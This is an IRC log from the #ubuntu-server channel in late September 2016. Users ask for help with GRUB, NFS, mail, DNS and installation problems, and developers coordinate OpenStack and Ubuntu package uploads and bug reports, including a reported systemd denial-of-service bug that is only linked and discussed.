<TJ-> Karunamon: what does this report? "hdparm --dco-identify /dev/sdX" ?
<Karunamon> https://gist.github.com/16e60ab28ad2f02c8663
<Karunamon> @TJ-
<Karunamon> I'm thinking I could bring this drive into work if there's something to mutter at hdparm to get that hpa disabled
<Karunamon> and get it plugged into real hardware
<TJ-> Karunamon: looks like ESXi is getting in the way
#ubuntu-server 2016-09-26
<Vapez> Hello, i have the following eror after i apt-get autoremove - error: can't find command `linux'.
<Vapez> i autoremove this http://pastebin.com/q56tB48r
<Vapez> I actually run just grub-emu, i didn't restart the server
<Vapez> anyone?
<Vapez> please!?
<RoyK> can you pastebin the error message as well?
<tsimonq2> Vapez: you might want to try #ubuntu as well
<Vapez> i tried #ubuntu, no one asked
<Vapez> no one answers
<Vapez> http://pastebin.com/70tSKVug RoyK
<tsimonq2> Vapez: be patient, and you will get an answer :)
<tsimonq2> Vapez: most people are away on the weekends anyways
<Vapez> i really can't be patient, it's a prod server
<RoyK> Vapez: looks a bit broken to me
<Vapez> RoyK: that it's the output of grub-emu, i am afraid to reboot the server
<RoyK> Vapez: perhaps http://askubuntu.com/questions/100329/message-sparse-file-not-allowed-after-installing-on-a-btrfs-filesystem
<RoyK> Vapez: what sort of filesystem are you using?
<Vapez> ext4. RoyK
<RoyK> no idea, sorry
<Vapez> http://pastebin.com/FJBdSRtt
<Vapez> mount
<Vapez> output
<RoyK> again, no idea
<Vapez> ok, i restart it
<Vapez> no problem at all
<Vapez> it's seems grub-emu it's broken
<Vapez> or that's the way it should work
<Vapez> anyway, i had snapshot created
<lucas_ai> What would be the best way to allow me to download and install packages while apt-get is already downloading or installing another package? At minimum I'd like to download the package AND its dependencies all while another package is being installed or downloaded, but while scheduling the install of ALL downloaded packages. Any ideas?
<lucas_ai> The easiest way I mean, so I can run: "sudo apt install gimp" and "sudo apt install inkscape" and they will not FULLY BLOCK EACH OTHER
<Ben64> lucas_ai: as you were told a bunch of other times, you can't
<lucas_ai> Any idea how to download a package (eg: gimp) and ALL its dependencies? No installation yet.
<lucas_ai> Ben64, I'm making a script for it
<Ben64> just do "sudo apt-get install gimp inkscape"
<Ben64> a little bit of planning will save you the 42 seconds you're worried about
<zioproto> hello
<zioproto> jamespage, coreycb : did you guys had a chance to look at https://code.launchpad.net/~zioproto/ubuntu/+source/nova/+git/nova/+merge/305234
<jamespage> zioproto, I did and niedbalski_ also did some work on it - basically it was a little ambiguous as to whether it was going to end up in master
<jamespage> in the end it did
<jamespage> see https://bugs.launchpad.net/nova/+bug/1608934
<ubottu> Launchpad bug 1608934 in OpenStack Compute (nova) mitaka "ephemeral/swap disk creation fails for local storage with image type raw/lvm" [High,In progress]
<lordievader> Good morning.
<zioproto> jamespage: ok. my merge request can be dropped because the fix is in the upstream master, right ?
<jamespage> cpaelzer, did a quick sniff of a ovs snapshot - test failure aligned to what's actually happening on the upstream branch
<jamespage> zioproto, its been superceeded - the pick was not quite clean anyway
<jamespage> zioproto, I think niedbalski_ is reviewing his patches again - they caused unit test failures in our branch build system
<zioproto> ok
<cpaelzer> jamespage: ok, so you are going to mask those 4 issues on all arch then ?
<cpaelzer> jamespage: or is that still only hitting BE platforms?
<jamespage> cpaelzer, no I'll let upstream sort that our first
<jamespage> cpaelzer, release should have been on the 22nd
<cpaelzer> jamespage: I know, I just checked  30 minutes ago if there is one already
<cpaelzer> jamespage: thanks for the update with the 12th september already
<cpaelzer> jamespage: but I think there is not much gain in updating it on a daily base due to it being postponed, so I'd wait until release happens
<cpaelzer> jamespage: do you have any extra insight when the real release will happen?
<cpaelzer> I think I need to start testing on what we have
<cpaelzer> :-/
<cpaelzer> anyway the prep work will then be already done once they release and that hits the archive
 * cpaelzer feels the release date ahead
<jamespage> cpaelzer, yeah
<jamespage> agreed
<PCdude> hey all :)
<PCdude> I have landscape installed on ubuntu
<frickler> jamespage: there was some discussion in #openstack-neutron last friday regarding https://bugs.launchpad.net/neutron/+bug/1622002 , the main issue is that openstack-infra refuses to use the new dnsmasq package from UCA for gate testing. so the question is whether dhcp_release6 could be backported into mainline xenial
<ubottu> Launchpad bug 1622002 in dnsmasq (Ubuntu) "dhcp_release6 can be called when it is not present" [Undecided,New]
<PCdude> There is an e-mail option for notifications
<PCdude> Now, I know this is not setup at all so I would be suprised that it would work, but how can I set it up?
<cpaelzer> PCdude: I tihnk it is the systems "normal" postfix mta setup http://askubuntu.com/questions/670926/landscape-email-notifications-not-working
<PCdude> cpaelzer: thanks I will try that one out
<coreycb> jamespage, ddellav: I'm somewhat blocked on pbr by this: https://bugs.launchpad.net/pbr/+bug/1627102
<ubottu> Launchpad bug 1627102 in PBR "1.10.0 test fails with gpg: agent_genkey failed: No such file or directory" [Undecided,New]
<coreycb> jamespage, ddellav: I posted a question in #gnupg for some advice
<ddellav> coreycb "gpg: invalid item '(setpref)' in preference string" sounds like some config directive was deprecated/removed in the newer version of gnupg
<coreycb> ddellav, yeah at first I thought that was the issue, but I get the same config works interactively and I get that same message but the key is still generated
<ddellav> ah ok so it's more of a warning than a blocker
<coreycb> jamespage, https://github.com/coreycb/python-pbr/commits/ubuntu/newton
<crazyadm> i cannot delete fs at installation?
<crazyadm> i want to delete everything and make /boot ubuntu-root ubuntu-swap
<crazyadm> how to do that?
<crazyadm> well?
<crazyadm> i want to have swap of 1.5g and it gives me 4gig
<crazyadm> any of you know?
<crazyadm> hello?
<crazyadm> i can't delete old partition table?
<crazyadm> nobody know?
<tomreyn> crazyadm: you can use manual partitioning. this will allow you to configure things as you wish.
<tomreyn> you can also delete old partitions this way (you may need to reboot to apply those changes, though)
<crazyadm> i chose, but i can't adjust the size
<tomreyn> you need to delete and re-create, this will allow you to set the size
<crazyadm> delete and recreate, and then reboot?
<tomreyn> there's no need to reboot unless you are told that something could not be writted / read-back successfully as a warning.
<tomreyn> *written
<crazyadm> installation seems confusing
<apb1963> I'm getting a permission denied error trying to NFS mount an exported file path.  showmount -e shows it mounted... /proc/fs/nfs/exports is empty, although earlier it had entries.  Restarting server, exportfs had no effect on that file, though showmount seems OK I guess.  ubuntu 16.04 server, debian client.
<crazyadm> apb1963, no_root_squash
<crazyadm> add that to your /etc/exports
<apb1963> crazyadm: You're a genius!!  Thanks!!!
<crazyadm> i'm linux administrator
<crazyadm> permission issue are tiny problems to me
<crazyadm> i'm good at cluster servers, cluster data storage
<apb1963> Fair enough.... I only admin when I can't get my work done.
<apb1963> I'm only good at nutclusters :)
#ubuntu-server 2016-09-27
<RustyShackleford> I'm setting up this computer as a headless file/media server
<RustyShackleford> recently got a macbook, and I'm wondering if there's different/better options than samba
<JanC> RustyShackleford: I assume MacOS also supports NFS, and then there are also media-specific servers
<jianmin> does anyone know if the openstack spell for conjure-up on ubuntu 16.04 works?
<jianmin> i get ceph-osd/2: hook failed: "mon-relation-changed" for ceph-mon:osd
<jianmin> or other similar mon failures
<jianmin> and the one time it got past mon, it failed on mysql with a config error
<jianmin> i kind of thing it's just a race condition of sorts, but blindly deploying everything in varying orders has only made it fail at different parts
<jianmin> bootstrapping juju containers without conjure-up works just fine
<jianmin> now running a headless install:
<jianmin> mysql/0: hook failed: "shared-db-relation-changed" for keystone:shared-db
<topi`_> hi folks, anyone run into a following problem with Trusty: apt-get install refuses to install the python3-software-properties pkg because of missing dependency python3 (>= 3.4~)
<topi`_> if I manually calculate that dependency, using "dpkg --compare-versions 3.4.0-2ubuntu1 ge 3.4~" I get a positive result
<topi`_> so I believe there must be some kind of bug in Trusty's version of apt-get
<cpaelzer> topi`_: any ppas enabled ?
<cpaelzer> topi`_: I just installed  python3-software-properties in a container and it worked
<ikonia> topi`_: yeah, you where told about this in #ubuntu
<ikonia> joining another channel and asking again won't change the reality
<lordievader> Good morning.
<stokachu> jianmin: the order shouldnt matter
<stokachu> jianmin: what versions of conjure-up and juju are you running
<coreycb> ddellav, which packages can I help with for liberty? bug 1619452
<ubottu> bug 1619452 in Ubuntu Cloud Archive liberty "[SRU] liberty point releases" [Undecided,Fix committed] https://launchpad.net/bugs/1619452
<ddellav> coreycb sahara and aodh were the weird ones i didn't know what to do with
<coreycb> ddellav, ok I'll take a look at those
<ddellav> sahara has a weird issue with one of it's deps, it's asking for openstack-pkg-tools version ~37 but that version isn't available as far as i can tell in liberty
<ddellav> aodh has the new point release tag already in the repo, but it's not merged into any branch as far as i can tell so i didn't move forward
<ddellav> coreycb these have their mitaka branches ready for review: lp:~ddellav/ubuntu/+source/neutron-fwaas lp:~ddellav/ubuntu/+source/neutron-lbaas lp:~ddellav/ubuntu/+source/neutron-vpnaas
<ddellav> as soon as neutron decides to finish it's git push that will be ready too
<coreycb> ddellav, taking a look.  aodh and cinder are uploaded and in the sru review queue for mitaka.
<coreycb> ddellav, neutron-*aas and keytone uploaded for mitaka
<coreycb> keystone that is
<ddellav> coreycb lp:~ddellav/ubuntu/+source/neutron
<coreycb> ddellav, neutron uploaded
<ddellav> coreycb lp:~ddellav/ubuntu/+source/ironic
<ddellav> coreycb looks like you already pushed my heat changes
<coreycb> ddellav, yep
<coreycb> heat's pushed
<coreycb> and uploaded
<coreycb> ddellav, ironic uploaded
<ddellav> coreycb ok that covers the mitaka ones besides sahara which is weird. I'm unable to find a repository with the proper version. There doesn't seem to be a unified repo anywhere.
<coreycb> ddellav, I'll look at sahara.  we sync that from debian since mitaka.
<coreycb> ddellav, aodh and sahara uploaded to liberty UCA
<coreycb> staging ppa, that is
<ddellav> coreycb ok, I'm rebasing the other liberty releases now
<coreycb> ddellav, sahara uploaded for mitaka
<ddellav> coreycb thanks
<jgrimm> smoser, https://bugs.launchpad.net/cloud-utils/+bug/1493188
<ubottu> Launchpad bug 1493188 in cloud-utils (Ubuntu Xenial) ""overlayfs" no longer exists" [Medium,Confirmed]
<jgrimm> smoser, ^^ is there a cloud-utils fix needed too?
<smoser> jgrimm, mount-image-callback's --overlay will be broken
<crazyadm> i just installed ubuntu-server
<jgrimm> smoser,  ok, is that ready to go soon?
<smoser> i can look at it.
<jianmin> conjure-up 2.0.1~beta1
<jianmin> 2.0-rc1-xenial-amd64
<jianmin> stokachu: ^
<jianmin> via the instructions here http://conjure-up.io/
<jianmin> and here http://conjure-up.io/docs/en/users/#getting-started
<jianmin> i've seen some stuff for manually building it all with juju commands. i might just try that and see if i can get it to work. i don't really think i need everything that the openstack spell is building just for a single box deployment
<jianmin> i'm running in 16.04 with 116GB GB SSD space, 1TB HDD, 64GB ram. it's a vm running on a debian host via kvm. nested virtualization is working elsewhere
<jianmin> in fact, juju bootstrapping a vanilla container works with no problems
<dakj> hello, is there anyone can help me to resolve a problem with MaaS and a Host VMware ESXi? thanks in advance.
 * powersj removed the daily bug triage topic from server meeting agenda and irccommands pages
<ill_logic> Hello, I was wondering if people here had an idea about Amazon ami release schedules?
<ill_logic> 14.04 hasn't had a new ami since the latest big openssl stuff.
<ill_logic> I'm just curious if that's something we should expect in the next day or so, or whether we should work around it
<nacc> Odd_Bloke: --^ would you know (or know who to ask?)
<Odd_Bloke> nacc: ill_logic: Let me have a look.
<nacc> Odd_Bloke: thanks!
<ill_logic> Odd_Bloke: Thank you!
<Odd_Bloke> ill_logic: The latest AMI I'm seeing is from the 19th of this month; is that the one you're seeing?
<ill_logic> Odd_Bloke: Yes. The big openssl update came on the 22nd, followed by a small followup on the 23rd.
<ill_logic> http://www.ubuntu.com/usn/usn-3087-1/ http://www.ubuntu.com/usn/usn-3087-2/
<ill_logic> changelogs.ubuntu.com/changelogs/pool/main/o/openssl/openssl_1.0.1f-1ubuntu2.21/changelog
<ill_logic> http://changelogs.ubuntu.com/changelogs/pool/main/o/openssl/openssl_1.0.1f-1ubuntu2.21/changelog
<ill_logic> You can see the dates there.
<Odd_Bloke> ill_logic: We generally only do a special release for openssl stuff when asked to by the security team; they didn't judge this a big enough issue to warrant that.
<ill_logic> Okay. So amis are not generated regularly then?
<ill_logic> For 14.04?
<Odd_Bloke> ill_logic: So we generate dailies for all changes in the image.
<Odd_Bloke> ill_logic: But we only promote these to release when either (a) the first boot experience will be affected, or (b) the Ubuntu security team tell us that something is important enough that we want it addressed even before people apply security updates.
<Odd_Bloke> ill_logic: (a) is almost always a new kernel; there are new kernels SRU'd every three weeks.
<ill_logic> So there are ami dailies, but you don't "release" them? Does that mean they haven't been through some sort of vetting process?
<ill_logic> i.e. do you recommend against using them?
<ill_logic> Or are they not actually available to the public via aws?
<Odd_Bloke> ill_logic: Correct; only releases have been tested.
<Odd_Bloke> But the dailies are public.
<ill_logic> Okay. So we can get them if we want, but it's caveat emptor.
<ill_logic> So it's not on that page.
<ill_logic> Okay, thanks a lot! I think I get the picture.
<coreycb> ddellav, trove uploaded for mitaka
<PCdude> I am trying to use postfix to send email with Amazon AWS SES
<PCdude> I can connect to the port 465
<PCdude> but the messsage gets to a state of deferred and does not send the e-mail
<PCdude> How can I troubleshoot this?
<tsimonq2> PCdude: try asking in #ubuntu if you don't get a response within a reasonable time :)
<PCdude> tsimonq2: will do, I thought with the type of problem its more suited here
<tsimonq2> PCdude: while that's generally a good idea, we have more people in #ubuntu :)
<PCdude> tsimonq2: are there right now :)
<PCdude> tsimonq2: let me ask u a weird question, I am searching for some cheap rack cases. Besides the normal ebay and such what are some good sites that sell them?
<tsimonq2> I have no clue
<PCdude> np, I will keep on searching
<PCdude> #join #ubuntu-offtopic
<PCdude> sorry...
<tsimonq2> it's ok PCdude :)
<PCdude> tsimonq2: u here often?
<tsimonq2> I hang out here, yeah :)
<blizzow> I have installed a couple 16.04 servers with LVM on top of an mdadm raid device.  Some of my installations keep giving me this "lvmetad is not active yet, using direct activation during sysinit" and end at (initramfs) unable to find my volume group where my root logical volume lives.
<blizzow> Anyone know how I can repair this?
<Phanes> has anyone gotten puppet master succesfully set up with puppetdb yet?
<Phanes> for xenial server?
#ubuntu-server 2016-09-28
<WhoAmi00> Hey guys
<WhoAmi00> does letsencrypt TLS cert works with postfix
<WhoAmi00> i'm using it but gmail shows that messages are not encrypted
<WhoAmi00> does the problem in my configuration or we need a S/MIME cert to avoid the red lock on google
<WhoAmi00> please help
<sarnold> does gmail provide any details about which specific server contacting them wasn't using starttls?
<sarnold> are you confident your server is contacting gmail's servers directly?
<WhoAmi00> i'm using openssl to send message to my gmail account
<sarnold> does tcpdump or wireshark show plaintext or encrypted?
<sarnold> ahhhh
<WhoAmi00> openssl s_client -connect 127.0.0.1:465
<sarnold> oh
<sarnold> that's still just to your server
<WhoAmi00> i want to know does we need a
<WhoAmi00> S/MIME cert for that
<WhoAmi00> or the problem is in my configuration
<sarnold> no, almost no one uses s/mime, google wouldn't make any headway if they wanted to force that :)
<sarnold> the little red broken lock icon is when the last SMTP server that talks to google doesn't use STARTTLS when negotiating an ESMTP connection
<WhoAmi00> so why it shows that the message are not encrypted ?!
<WhoAmi00> i have reinstall everything
<WhoAmi00> this time i have reinstalled the OS
<WhoAmi00> and installed only postfix and letsencrypt
<WhoAmi00> with default configuration still nothing
<nicola> hj
<RustyShackleford> how do you back up private keys?
<RustyShackleford> do you only keep one copy? It would be pretty bad if you lost it
<cpaelzer_> jamespage: do you know of any changes to the 2.6 ovs that forces one to configure differently?
<cpaelzer_> jamespage: the way I used to connect my guests no more gets them out to the network
<cpaelzer_> used libvirt to set them up with a openvswitch type network and a refernce to that in the guest xml
<cpaelzer_> the device still appears, but it seemt to have no connection
<cpaelzer_> the host reports the status of the ovs bridge as it did in the past
<cpaelzer_> jamespage: just let me know if you are aware of any to-be-expected changes that have to be done differently
<cpaelzer_> btw - no dpdk involved yet
<thekrynn> does anyone know why the find command might be brutally slow when used on a directory over NFS as compared to locally on the machine that's hosting it
<cpaelzer_> thekrynn: find mostly does read metadata on the fs which is mostly from memory on the local system
<cpaelzer_> thekrynn: it can't be fully from memory on a NFS setup, so you get network latencies in between which are >>> memory latencies
<thekrynn> yuck.. so it almost makes more sense doing a find and making the file list locally on the machine and grabbing that remotely via NFS instead?
<hateball> or use some sort of indexing
<cpaelzer_> jamespage: I'm dropping the breadcrumbs I found while debugging here - you let me know if anything rings a bell (other than my IRC messages in your chat lcient)
<cpaelzer_> jamespage: it seems that the host network interface that is connected to the OVS is "down" on yakkety
<cpaelzer_> jamespage: on Xenial something brought it up (as least I didn't before)
<cpaelzer_> jamespage: I upped the ext interface on the host which got it doing "something" at least
<cpaelzer_> jamespage: killing all outstanding dhcp processes and starting a fresh one gave me networking
 * cpaelzer_ goes stop/starting the guest to see what survives
<cpaelzer_> oh I have a _
<cpaelzer> better
<cpaelzer> jamespage: well, that was it - the device in the host seems no more to be default up in my Yakkety
<jamespage> cpaelzer, is this the port connected to the outside world?
<cpaelzer> jamespage: yes
<cpaelzer> jamespage: in the past it was always up by default it seems - at least I never had to do anything
<jamespage> cpaelzer, its always been dependent on the OS to up the interface - ovs won't ever do that
<jamespage> ip link set <interface> up
<cpaelzer> jamespage: sure, that is what I added
<jamespage> maybe the switch to networkd ?
<cpaelzer> jamespage: yeah, something like that might be the root cause
<cpaelzer> jamespage: I already checked, but it is neither libvirts task when starting the network
<cpaelzer> jamespage: it doesn't know the ext port to be added later
<cpaelzer> jamespage: so as you say it is OS/Admins task - I was just in the pitfall of this being different now
 * cpaelzer is now out of the pit and ready for the next
<Drecondius> hellooooooooo, I have this really weird issue that makes no sense to me at all, I can log into my machine through ssh with no problem at all. but when I hook up a monitor and keyboard to the physical machine i have no access, just a blank screen, do i need to remove the ssh server and just leave client on it or did I goof something up bad?
<Drecondius> btdubs, my google-fu is rusty and needs some work i'll readily admit, but I'm stumped, and so is google.
<ducasse> Drecondius: what kind of gpu?
<Drecondius> onboard
<ducasse> Drecondius: intel?
<Drecondius> intel i believe, the catch is I have display when running the installer
<Drecondius> and I'm ssh'd into my machine right now, but if I run team  viewer or go turn on the monitor and bang 30 or so keys there still isn't a login prompt
<ducasse> Drecondius: not sure. do you see boot messages or just the grub menu?
<Drecondius> no messages
<Drecondius> i do catch the loading screen on occasion
<Drecondius> but it's the splash screen after it loads the system, it's like the gpu is turned off almost
<Drecondius> but I can go in there and boot my usb with the server installer on it and have full (relative term here) video
<ducasse> Drecondius: edit /etc/default/grub, replace 'quiet splash' with 'text'. then run update-grub and reboot.
<Drecondius> back in a moment
<Drecondius> so the quiet splash was interfering with the framebuffer?
<ducasse> Drecondius: tbh, i'm just guessing what causes this, but i had the same problem on my home file server :)
<Drecondius> Which brings me to another question, How can i setup this server to accept ftp transfers?
<Drecondius> run a samba daemon?
<Drecondius> or something easier lol
<Drecondius> lemme check first
<ducasse> Drecondius: for ftp you need an ftp daemon, but consider sftp instead
<cpaelzer> jamespage: are you also pushing OVS 2.5.1 into xenial since it was release along
<cpaelzer> jamespage: and if so if you want a verify of the DPDK bits against a ppa let me know where you have it
<cpaelzer> well atm I'd need to redeploy my test system to xenial for that
<cpaelzer> but I expect that we rush all yakkety things first and then you'll get to 2.5.1 right?
<jamespage> coreycb, ddellav: swift 2.10.0 release 2 days ago
<coreycb> jamespage, I'll get that, ironic, and any new rc2's today
<jamespage> coreycb, super
<jamespage> thanks
<jamespage> coreycb, I did networking-ovn and I'm about to tidy vmware-nsx as well
<coreycb> jamespage, awesome
<crazyadm> im using ubuntu server
<crazyadm> is there a command line torrent downloader that works with magnet
<ducasse> crazyadm: ask in #ubuntu, better chance of answer
<dlloyd> deluge
<crazyadm> deluge is cmi?
<crazyadm> i don't have gui
<dlloyd> there is a deluge-cli package iirc
<dlloyd> deluge-console
<ddellav> rtorrent
<ddellav> though i don't know about magnet
<nacc> coreycb: iirc, you said you had a handle on the cinder ftbfs (http://qa.ubuntuwire.org/ftbfs/test-rebuild-20160916-yakkety.html#ubuntu-server) -- do you also have fixes en-route for nova and nova-lxd?
<coreycb> nacc, thanks for the nudge. I'll handle those.
<nacc> coreycb: thank you!
<coreycb> beisner, python-novaclient was just accepted into xenial-proposed with the fix for bug 1559072
<ubottu> bug 1559072 in python-cinderclient "[SRU] exceptions.from_response with webob 1.6.0 results in "AttributeError: 'unicode' object has no attribute 'get'"" [Undecided,New] https://launchpad.net/bugs/1559072
<jamespage> bug 1608934
<ubottu> bug 1608934 in OpenStack Compute (nova) mitaka "ephemeral/swap disk creation fails for local storage with image type raw/lvm" [High,In progress] https://launchpad.net/bugs/1608934
<rattking> Hello does anyone have any experience using syslog-ng on 16.04? I am finding that the kernel boot messages are not being logged in syslog-ng, and if I add /proc/kmsg as a source the log lines from boot come in out of order with other log messages
<patdk-wk> rattking, likely a systemd issue
<rattking> lol yeah.. I had a feeling like it had something to do with journald
<coreycb> nacc, for the nova and nova-lxd ftbfs, the new versions in -proposed will fix those
<nacc> coreycb: great, thanks for following up
<coreycb> nacc, np
<nacc> jgrimm: --^ making slow and steady progress then, i think we're down to 10-11 total
<jgrimm> nacc great!
<km0rz> Hello everyone, just dipping my toes into Linux for the first time in a lab at home. I'm currently trying to get internal DNS configured on ubuntu-16.04.1 server, so far I've got it resolving the one internal "lab" zone i created. What i was wondering is it possible for it to reply authoritatively for the one zone i've configured, but forward on all other DNS requests externally?
<electriclewis> yes
<electriclewis> I find easiest way to configure DNS for home is to use webmin
<genii> !webmin
<ubottu> webmin is no longer supported in Debian and Ubuntu. It is not compatible with the way that Ubuntu packages handle configuration files, and is likely to cause unexpected issues with your system.
<genii> ...just FYI
<electriclewis> ouch
<electriclewis> what should I use instead?
<km0rz> I was reading that I should be able to do a "Hybrid" mode, where i can host primary zones but also forward
<km0rz> but when i turned on forwarders my one primary zone that was working, stopped
<electriclewis> OK, so apparently webmin was bad in 2008 but since 2012 it's fine with Debian and Ubuntu.  Is this wrong?
<beisner> coreycb, tyvm
<Walex> electriclewis: it has improved a lot, but I prefer non-graphical configuration
<electriclewis> Walex I do for most things too, but DNS files are a PITA
<patdk-wk> why would you touch a dns file?
<patdk-wk> what is a dns file?
<coreycb> ddellav, jamespage: I just uploaded a bunch of rc2's for newton as well as new swift, ironic, and synced python-swiftclient
<ThePentester> anyone with experince in mailing ?!
<Gorian> I have a lot of experience in receiving mail
<Gorian> both physical AND virtual
<jgrimm> nacc, can you kindly nominate 1611923/pythond-django for xenial?
<nacc> ack
<jgrimm> thanks!
<nacc> jgrimm: i think your update was meant to go against the original description, though?
<jgrimm> nacc, doh, thanks
<nacc> jgrimm: np, task opened btw
<Ussat> https://www.agwa.name/blog/post/how_to_crash_systemd_in_one_tweet
<OerHeks> Ussat, oef, ugly one.
<OerHeks> Did you verify?
<Ussat> yup
<Ussat> RHEL, Cent and Ubuntu 16.04 LTS system
<Ussat> all verified on
<OerHeks> lets wait for reactions here :-)
<Ussat> fortunatelt my systems locked down pretty tight, but still
<OerHeks> maybe worth a bugreport, i am looking for simular now.
<Ussat> because, ya know, everything should run as 1 pid
<Ussat> ...
<OerHeks> https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1628687
<ubottu> Launchpad bug 1628687 in systemd (Ubuntu Yakkety) "Assertion failure when PID 1 receives a zero-length message over notify socket" [Undecided,Confirmed]
<OerHeks> thank you for reporting, Ussat , maybe you can confirm this one.
<Ussat> its the same
<OerHeks> then 'affects 1 person will be 2.
<Ussat> That is the same bug
<OerHeks> Oh you are already on it?
<Ussat> I saw that earlier is all
<OerHeks> hmm even as non-root user.
<tomreyn> is thit is cross-user then it's a security vulnerability (denial of service) and should be tagges security
<tomreyn> *tagged
<tomreyn> which should then get it the attention it (then) deserves
<tomreyn> *if this
<tomreyn> sorry about the spelling ;)
<OerHeks> CVE is requested now.
<tomreyn> i just realized
<OerHeks> "It is unfortunate that this was not handled using a 'responsible disclosure' process. "  true, this channel is logged :-(
#ubuntu-server 2016-09-29
<ThePentester1> Hello
<ThePentester1> can we assign more than one ip on AWS EC2 dedicated server
<frickler> jamespage: seems neutron rc3 is needed https://bugs.launchpad.net/bugs/1628549
<ubottu> Launchpad bug 1628549 in neutron "DB migration is broken with two unassigned floating IPs" [High,Fix released]
<ThePentester1> can we assign more than one ip on AWS EC2 dedicated server ?
<lordievader> Good morning.
<Dulcin> Hi, I have a dedicated ubuntu server and I want to run a clean install on it and migrate all data back to it. Would it be easy to request an image and just install that image on a local PC here as backup or would I run into hardware problems then?
<Dulcin> I think easiest would be buying a new dedicated server and cancelling this one after migration, but their prices seem to have gone up a lot through the years
<thekrynn> is it common for NFS to cause high load averages with minimal cpu?
<lordievader> thekrynn: Depends on the usage, I'd say. If a hundreds of clients are hammering the NFS server, yeah expect a high load.
<thekrynn> lordievader: basically i have an NFS server, an NFS client, both running on the same hypervisor, and the client is simply grabbing data, awk'ing it, and then writing back small files
<thekrynn> at around 500Mbit/s
<lordievader> Check vmstat I'd say, if you see a lot of blocked processes and a high io-wait time, might be the cause.
<thekrynn> thanks lordievader
<thekrynn> seems like cating the data over nfs into a pipe was causing a lot of the issues
<thekrynn> i changed that out and the cpu wait in vmstat went down considerably
<lordievader> ;)
<lordievader> Glad you solved it.
<frickler> jamespage: coreycb: could you check for working dependencies here, please? https://bugs.launchpad.net/keystone/+bug/1628883
<ubottu> Launchpad bug 1628883 in OpenStack Identity (keystone) "Minimum requirements too low on oslo.log for keystone" [Undecided,New]
<coreycb> frickler, we'll fix that up, thanks for reporting it.
<frickler> coreycb: thanks, I'll also go and see what upstream thinks about this
<coreycb> frickler, it seems that global-requirements is too low: https://github.com/openstack/requirements/blob/stable/newton/global-requirements.txt
<coreycb> frickler, keystone has a higher min version in their requirements.txt but it should align with g-r
<coreycb> frickler, I'll add upstream to the bug
<coreycb> frickler, nm they are aligned at >= 1.14.0.  I was on the wrong keystone branch.
<coreycb> still a problem obviously
<coreycb> frickler, jamespage, ddellav: I just took a pass on all of our core newton packages to bump oslo.log >= 3.16.0
<caribou> rbasak: nacc: jgrimm: regarding the current clamav package in Yakkety, I don't think that we should wait on the MIR for tomsfastmath
<caribou> mdeslaur has uploaded 0.99-2 in all the stable releases while keeping the old in-package library so I think that Yakkety should to the same
<caribou> then we can wait for 17.04 to MIR the library
<jgrimm> caribou, that works for me
<jgrimm> caribou, though.. its a bit odd that the MIR should take long?? that is, isn't it just a breakout of the previously embedded library which is already in main.
<jgrimm> caribou, but, i'm find with that given where we are at in the cycle
<caribou> jgrimm: the security team already has a long backlog of MIR reviews
<jgrimm> fine
<jgrimm> caribou, I added it here for tracking -> https://blueprints.launchpad.net/ubuntu/+spec/servercloud-z-server-core
<jgrimm> thanks
<coreycb> ddellav, gnocchi ok to sync?
<coreycb> ddellav, and magnum?
<ddellav> coreycb those were a bit weird because they aren't RC1, they are full version releases. I wasn't sure if they were applicable. I will run quick builds on them now.
<nacc> jamespage: can't recall if i saw, but did you have a test import you wanted us to run for the git workflow?
<coreycb> ddellav, they've likely just made it to final release already
<ddellav> coreycb gnocchi needs a python-gabbi sync. gabbi builds in xenial and yakkety without issue.
<coreycb> ddellav, ok sync initiated for gabbi
<ddellav> coreycb how are we doing  with python-os-api-ref? That's needed for magnum as well
<ddellav> as is python-k8sclient which builds on both fine and could use a sync
<jamespage> coreycb, quick poke
<jamespage> nova -> os-brick requires privsep
<coreycb> ddellav, looks like os-api-ref is in the archive now
<coreycb> ddellav, at least, it's not in the NEW queue anymore https://launchpad.net/ubuntu/yakkety/+queue?queue_state=1&queue_text=
<coreycb> ddellav, eh... wrong queue, still there: https://launchpad.net/ubuntu/yakkety/+queue?queue_state=0&queue_text=
<coreycb> ddellav, I poked the release team this morning about it, I'll poke again
<coreycb> jamespage, ok, yeah it looks like we can't get around it
<coreycb> jamespage, I'm following up on openstack VMT to ensure it's security supported by upstream
<jamespage> coreycb, +1
<jamespage> sarnold, ^^
<coreycb> ddellav, in the mean time can you just build anything that depends on os-api-ref in a ppa and we'll get the syncs in the queue?
<ddellav> coreycb yep
<coreycb> ddellav, thanks
<coreycb> rockstar, pylxd 2.1.1 uploaded to yakkety
<rockstar> coreycb: aces
<coreycb> ddellav, k8sclient sync initiated
<sarnold> jamespage,coreycb, thanks (openstack vmt supporting oslo.privsep)
<coreycb> sarnold, you're welcome, thanks for the review
<coreycb> jamespage, ddellav: I opened bug 1629097 for neutron in newton
<ubottu> bug 1629097 in neutron "neutron-rootwrap processes not getting cleaned up" [Undecided,New] https://launchpad.net/bugs/1629097
<coreycb> seems to be the cause of memory exhaustion in our charm deploys of nova-compute and neutron-gateway
<coreycb> beisner, ^
<jamespage> coreycb, broken dns?
<coreycb> jamespage, think so?
<coreycb> jamespage, I deployed mitaka for comparison and there weren't any issues
<coreycb> jamespage, and reverting that commit seemed to help.  let me unrevert to double check.
<jamespage> maybe not
<coreycb> jamespage, ok confirmed that reverting that commit fixes it
<jamespage> coreycb, awesome
<jamespage> dannf, hey - I think that arm64 hugepages patch is a little late for newton fwiw
<jamespage> esp as its not accepted upstream yet
#ubuntu-server 2016-09-30
<masber> hi
<masber> what would be the alternative of "alternative" command on ubuntu?
<masber> which command on ubuntu can use instead of "alternative"?
<sarnold> alternatives are just symlinks
<masber> sarnold, oh thanks!
<sarnold> masber: for example, ls -l `which awk`  -- /usr/bin/awk -> /etc/alternatives/awk
<sarnold> then ls -l ... /etc/alternatives/awk -> /usr/bin/gawk
<sarnold> so if yo'uve broken your alternatives, you can get something working again by hand
<crazyadm> how to install nfs server?
<henkjan> crazyadm: apt-get install nfs-kernel-server
<crazyadm> anyone setup docker on ubuntu?
<PCdude> Hi all :)
<PCdude> I have done some experimenting with openstack
<PCdude> I have some 10 gbit/s cards that can be used by the nodes of openstack
<PCdude> Is there a possible I can connect the storage node to the compute nodes with a direct connection from host-to-host?
<cpaelzer> jamespage: dpdk 16.07-0ubuntu4 just got accepted into yakkety, testing OVS-DPDK without it won't be fun for you, so be aware in case you try just too early :-)
<cpaelzer> jamespage: bug 1628419 and bug 1625542 would stop your tests
